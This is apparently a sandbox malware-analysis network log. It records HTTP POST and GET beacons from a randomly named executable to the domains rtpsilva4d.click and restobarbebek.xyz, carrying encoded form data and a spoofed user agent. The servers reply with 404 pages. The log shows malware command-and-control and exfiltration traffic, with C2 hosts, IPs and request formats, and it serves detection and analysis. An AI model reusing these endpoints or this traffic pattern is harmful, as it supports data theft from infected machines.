                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.65002567.223.117.169802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:09.588248014 CET819OUTPOST /mbcs/ HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.rtpsilva4d.click
                                                                                                        Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 4a 2b 47 71 6b 78 5a 47 78 6b 43 56 73 6e 56 6d 36 33 64 4a 55 39 43 41 72 79 46 75 64 43 63 47 72 57 65 36 39 68 65 56 69 63 64 75 2f 6d 6d 37 55 46 71 63 47 2f 2b 55 70 38 2b 55 45 38 4c 2b 79 66 73 52 79 35 65 6b 6c 6a 6c 70 49 65 30 76 63 77 73 69 73 68 2b 6b 6a 58 61 6c 31 6f 46 46 42 6d 45 4b 42 63 6a 4e 47 66 47 51 46 50 4d 44 53 45 56 33 4f 2b 4c 42 4b 6a 5a 67 31 47 74 48 6b 2b 62 70 64 2b 30 61 77 7a 56 59 39 6a 73 36 73 46 6b 75 57 38 45 59 6d 35 34 59 47 76 6c 31 53 61 71 55 79 56 52 41 6e 36 49 64 44 4d 67 6f 73 4f 57 65 77 4c 77 36 6e 55 6a 55 63 34 30 74 2b 41 69 41 65 2f 2f 57 74 33 36 48
                                                                                                        Data Ascii: aNXP_jw=J+GqkxZGxkCVsnVm63dJU9CAryFudCcGrWe69heVicdu/mm7UFqcG/+Up8+UE8L+yfsRy5ekljlpIe0vcwsish+kjXal1oFFBmEKBcjNGfGQFPMDSEV3O+LBKjZg1GtHk+bpd+0awzVY9js6sFkuW8EYm54YGvl1SaqUyVRAn6IdDMgosOWewLw6nUjUc40t+AiAe//Wt36H
                                                                                                        Dec 2, 2024 14:40:10.781769037 CET479INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:10 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.65002667.223.117.169802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:12.262773037 CET843OUTPOST /mbcs/ HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.rtpsilva4d.click
                                                                                                        Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 4a 2b 47 71 6b 78 5a 47 78 6b 43 56 75 48 6c 6d 71 6b 31 4a 56 64 43 44 33 69 46 75 58 69 64 50 72 57 53 36 39 6b 37 49 69 70 31 75 2b 47 32 37 56 45 71 63 46 2f 2b 55 68 63 2b 52 41 38 4c 31 79 66 51 6a 79 34 69 6b 6c 6a 68 70 49 61 77 76 63 68 73 68 74 78 2b 63 36 48 61 6e 78 6f 46 46 42 6d 45 4b 42 63 33 6e 47 66 65 51 5a 75 38 44 55 68 68 32 41 65 4c 4f 43 44 5a 67 6a 32 74 4c 6b 2b 62 50 64 2f 6f 77 77 78 74 59 39 6e 38 36 74 52 34 74 44 73 45 6b 6f 5a 35 66 46 75 51 35 54 61 2f 41 74 46 5a 4e 37 34 4a 36 47 36 39 79 77 39 57 39 69 62 51 34 6e 57 37 6d 63 59 30 48 38 41 61 41 4d 6f 7a 78 69 44 66 6b 37 42 31 6e 56 56 7a 49 72 58 4f 74 61 36 48 68 53 72 4d 79 65 41 3d 3d
                                                                                                        Data Ascii: aNXP_jw=J+GqkxZGxkCVuHlmqk1JVdCD3iFuXidPrWS69k7Iip1u+G27VEqcF/+Uhc+RA8L1yfQjy4ikljhpIawvchshtx+c6HanxoFFBmEKBc3nGfeQZu8DUhh2AeLOCDZgj2tLk+bPd/owwxtY9n86tR4tDsEkoZ5fFuQ5Ta/AtFZN74J6G69yw9W9ibQ4nW7mcY0H8AaAMozxiDfk7B1nVVzIrXOta6HhSrMyeA==
                                                                                                        Dec 2, 2024 14:40:13.518690109 CET479INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:13 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.65002767.223.117.169802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:14.933132887 CET1856OUTPOST /mbcs/ HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.rtpsilva4d.click
                                                                                                        Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 4a 2b 47 71 6b 78 5a 47 78 6b 43 56 75 48 6c 6d 71 6b 31 4a 56 64 43 44 33 69 46 75 58 69 64 50 72 57 53 36 39 6b 37 49 69 70 74 75 2b 31 75 37 58 6e 53 63 45 2f 2b 55 72 38 2b 51 41 38 4c 73 79 66 34 6e 79 34 75 61 6c 68 4a 70 48 66 6b 76 49 43 30 68 69 78 2b 63 6e 58 61 6d 31 6f 46 71 42 6d 55 4f 42 63 6e 6e 47 66 65 51 5a 73 6b 44 55 30 56 32 4e 2b 4c 42 4b 6a 5a 38 31 47 73 65 6b 34 79 36 64 2f 38 4b 33 41 4e 59 38 48 73 36 76 6b 6b 74 43 4d 45 69 72 5a 35 39 46 75 4e 37 54 62 54 4d 74 47 45 6d 37 34 4e 36 47 4e 73 44 31 65 36 63 68 61 34 6e 32 45 7a 59 53 74 73 35 79 67 4f 62 64 4b 50 4e 72 58 4c 63 6a 46 42 4c 51 32 36 57 69 6b 76 44 47 39 57 43 58 70 35 35 4a 6b 2b 65 43 49 6a 35 44 74 2b 5a 48 32 4c 59 66 6c 2b 61 64 68 57 36 71 34 57 4e 6e 4e 58 56 47 6a 4b 66 58 6c 6b 35 4b 6c 73 77 76 73 74 42 63 54 4b 35 30 45 4c 51 6f 33 58 42 38 6f 65 4c 50 32 49 6b 50 5a 61 72 54 64 68 79 4e 5a 71 35 78 4a 71 6a 4f 43 6d 64 4e 45 41 71 66 72 79 78 52 59 64 47 77 50 7a 68 59 6d [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=J+GqkxZGxkCVuHlmqk1JVdCD3iFuXidPrWS69k7Iiptu+1u7XnScE/+Ur8+QA8Lsyf4ny4ualhJpHfkvIC0hix+cnXam1oFqBmUOBcnnGfeQZskDU0V2N+LBKjZ81Gsek4y6d/8K3ANY8Hs6vkktCMEirZ59FuN7TbTMtGEm74N6GNsD1e6cha4n2EzYSts5ygObdKPNrXLcjFBLQ26WikvDG9WCXp55Jk+eCIj5Dt+ZH2LYfl+adhW6q4WNnNXVGjKfXlk5KlswvstBcTK50ELQo3XB8oeLP2IkPZarTdhyNZq5xJqjOCmdNEAqfryxRYdGwPzhYmiFMm9zKUaJqFWZ+zE7U/tPf4be3CC9Pv3JhW3Is5lZEvH5lzZn2QHynY+AjqLSXwM1mpaAVuimPvIH0S6eUZx2/028BJZ3v/lBh1NFI11Gps47S+gIlfg+R8WQTsIS3lH477TqEgrLpWCubkRe/x/ZyZ9u+EcfROb9+wIOJ5SGlHCKdvIoquQPN0qhXjW+wda6D22hceRlrfnmeORWqUS+yiXGjFmzOOinC1gi933wqh8HqwNIISQAjB8LcAqyiGc02005YkI+Ch9Nz2zpK2yjwcJvgKCmOZcxMlp8BYT+o/td4RJ/nKHV6vUVFl2sTXIlYXVXNCl93izb0cXMC43JEzM+3OxeqXfFt0lr7a9ULsd1UaMcac1xTIMiooExzg2pe2LcaStHq8b7UxvJfbw561XqRdZk52bzg/WO3nUxGTf7kHVPJpZcA4hGAKaNQ4QD9JVYr7NsmSpKkKVnx8X5aFOfzjSvdCMzufeBQVWw/277dpSnx6EptqIApSbi8n0CR514ffotdElwDJRDsvau6TF2jurZ/d6y9YliXfmZaQRzIyrWZVQbQ9kcnvXlXB01iBsHxVvcfqunSTSUiua2dBtyV42fobsglZNdi68caL5SXHS5fQ+PVtzU28wvl5s4OzfYNI3Sss0kMVJtrSYPOkpNksvY1Rlv [TRUNCATED]
                                                                                                        Dec 2, 2024 14:40:16.194259882 CET479INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:15 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        36192.168.2.65002867.223.117.169802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:17.599652052 CET553OUTGET /mbcs/?cTT8u=Q4NHoHJ0&aNXP_jw=E8uKnHhByG2Tv3dXt0hUXbTg8EJLb11h3Xjfw3eru7l4vir7amLvL6eqi8CHILvLkZwm8qiwgwp5C/0JAU8dpm6junvogZRuLkUhLJLqNe6fCvA+b04RO+uOFUQ6tBhUgoCpKJY= HTTP/1.1
                                                                                                        Host: www.rtpsilva4d.click
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:40:18.811355114 CET479INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:18 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 315
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        37192.168.2.65002985.159.66.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:24.729211092 CET822OUTPOST /jm9b/ HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.restobarbebek.xyz
                                                                                                        Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 61 71 35 73 6d 6d 39 4b 7a 32 74 57 35 41 63 43 42 58 43 38 47 45 57 5a 33 66 4f 70 33 75 70 4c 4a 2b 4c 38 61 4f 71 77 63 44 6f 6e 54 70 59 76 45 2b 5a 4c 79 75 32 5a 44 36 52 42 6a 78 58 61 73 50 61 78 4f 46 52 64 33 4f 58 50 36 75 71 54 7a 6a 30 57 68 43 6d 37 32 2f 6c 61 75 68 5a 53 51 55 76 4e 53 77 32 50 6e 46 78 70 79 62 44 42 62 6c 58 32 70 36 59 45 51 79 62 45 5a 62 37 69 6f 39 33 6f 61 50 54 67 5a 4a 61 6b 32 79 33 4e 38 62 4d 68 57 56 69 58 37 35 36 70 4b 78 79 2b 47 75 72 75 38 4a 66 69 67 47 66 38 53 53 6c 31 48 78 31 2f 67 2b 42 51 74 65 6b 53 30 64 44 48 65 52 73 63 42 30 55 41 72 51 46 43
                                                                                                        Data Ascii: aNXP_jw=aq5smm9Kz2tW5AcCBXC8GEWZ3fOp3upLJ+L8aOqwcDonTpYvE+ZLyu2ZD6RBjxXasPaxOFRd3OXP6uqTzj0WhCm72/lauhZSQUvNSw2PnFxpybDBblX2p6YEQybEZb7io93oaPTgZJak2y3N8bMhWViX756pKxy+Guru8JfigGf8SSl1Hx1/g+BQtekS0dDHeRscB0UArQFC


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        38192.168.2.65003085.159.66.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:27.402673006 CET846OUTPOST /jm9b/ HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.restobarbebek.xyz
                                                                                                        Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 61 71 35 73 6d 6d 39 4b 7a 32 74 57 6f 51 4d 43 48 30 36 38 41 6b 57 65 34 2f 4f 70 2b 4f 70 48 4a 2b 48 38 61 4c 4b 65 64 77 63 6e 53 4d 38 76 46 36 4e 4c 38 4f 32 5a 4d 71 52 41 75 52 58 45 73 50 57 44 4f 45 39 64 33 4f 44 50 36 73 69 54 7a 55 49 58 75 79 6d 35 33 50 6c 59 78 78 5a 53 51 55 76 4e 53 32 61 78 6e 46 35 70 79 71 7a 42 64 77 6a 78 31 71 59 48 64 69 62 45 64 62 37 6d 6f 39 32 4e 61 4f 4f 4c 5a 4b 79 6b 32 79 48 4e 38 4b 4d 69 59 56 69 5a 6a 5a 37 45 4e 41 53 32 66 4f 2f 75 36 6f 48 68 30 78 66 2b 58 6b 34 76 62 43 31 63 79 75 68 53 74 63 38 67 30 39 44 74 63 52 55 63 54 6a 59 6e 6b 6b 67 68 43 43 58 38 76 53 44 35 6f 4d 6a 6e 31 59 64 49 2b 64 79 32 42 77 3d 3d
                                                                                                        Data Ascii: aNXP_jw=aq5smm9Kz2tWoQMCH068AkWe4/Op+OpHJ+H8aLKedwcnSM8vF6NL8O2ZMqRAuRXEsPWDOE9d3ODP6siTzUIXuym53PlYxxZSQUvNS2axnF5pyqzBdwjx1qYHdibEdb7mo92NaOOLZKyk2yHN8KMiYViZjZ7ENAS2fO/u6oHh0xf+Xk4vbC1cyuhStc8g09DtcRUcTjYnkkghCCX8vSD5oMjn1YdI+dy2Bw==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        39192.168.2.65003185.159.66.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:30.076677084 CET1859OUTPOST /jm9b/ HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.restobarbebek.xyz
                                                                                                        Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 61 71 35 73 6d 6d 39 4b 7a 32 74 57 6f 51 4d 43 48 30 36 38 41 6b 57 65 34 2f 4f 70 2b 4f 70 48 4a 2b 48 38 61 4c 4b 65 64 78 6b 6e 53 36 67 76 48 64 68 4c 39 4f 32 5a 4b 61 52 46 75 52 57 42 73 4d 6d 39 4f 45 41 69 33 49 50 50 37 4a 32 54 31 67 63 58 31 69 6d 35 38 76 6c 64 75 68 59 59 51 51 4c 33 53 77 36 78 6e 46 35 70 79 6f 72 42 4c 56 58 78 6d 61 59 45 51 79 62 41 5a 62 37 4f 6f 39 2f 77 61 4f 62 77 5a 37 53 6b 32 57 6a 4e 35 34 6b 69 51 56 69 62 67 5a 37 63 4e 41 66 6f 66 50 53 64 36 6f 69 47 30 32 66 2b 55 44 4d 78 4f 42 46 48 75 50 34 79 7a 37 4d 38 79 4a 66 35 46 58 45 34 63 42 42 50 6d 57 34 2b 4b 46 76 6b 35 54 6a 68 2b 38 72 55 37 66 34 2f 2b 59 50 64 53 38 67 78 56 48 47 65 5a 71 6b 2b 7a 37 49 56 36 48 36 6c 33 4a 6a 6c 67 74 51 61 69 71 55 4b 72 59 48 2b 36 6a 53 38 62 64 48 42 78 6a 37 66 44 51 2f 62 47 58 71 6e 33 6b 4d 4e 35 77 49 36 7a 55 34 50 36 33 42 6b 58 33 2f 61 2b 63 2b 75 45 7a 42 35 58 6c 58 69 62 47 79 4b 47 54 61 4c 31 79 7a 6c 38 4c 47 39 73 33 [TRUNCATED]
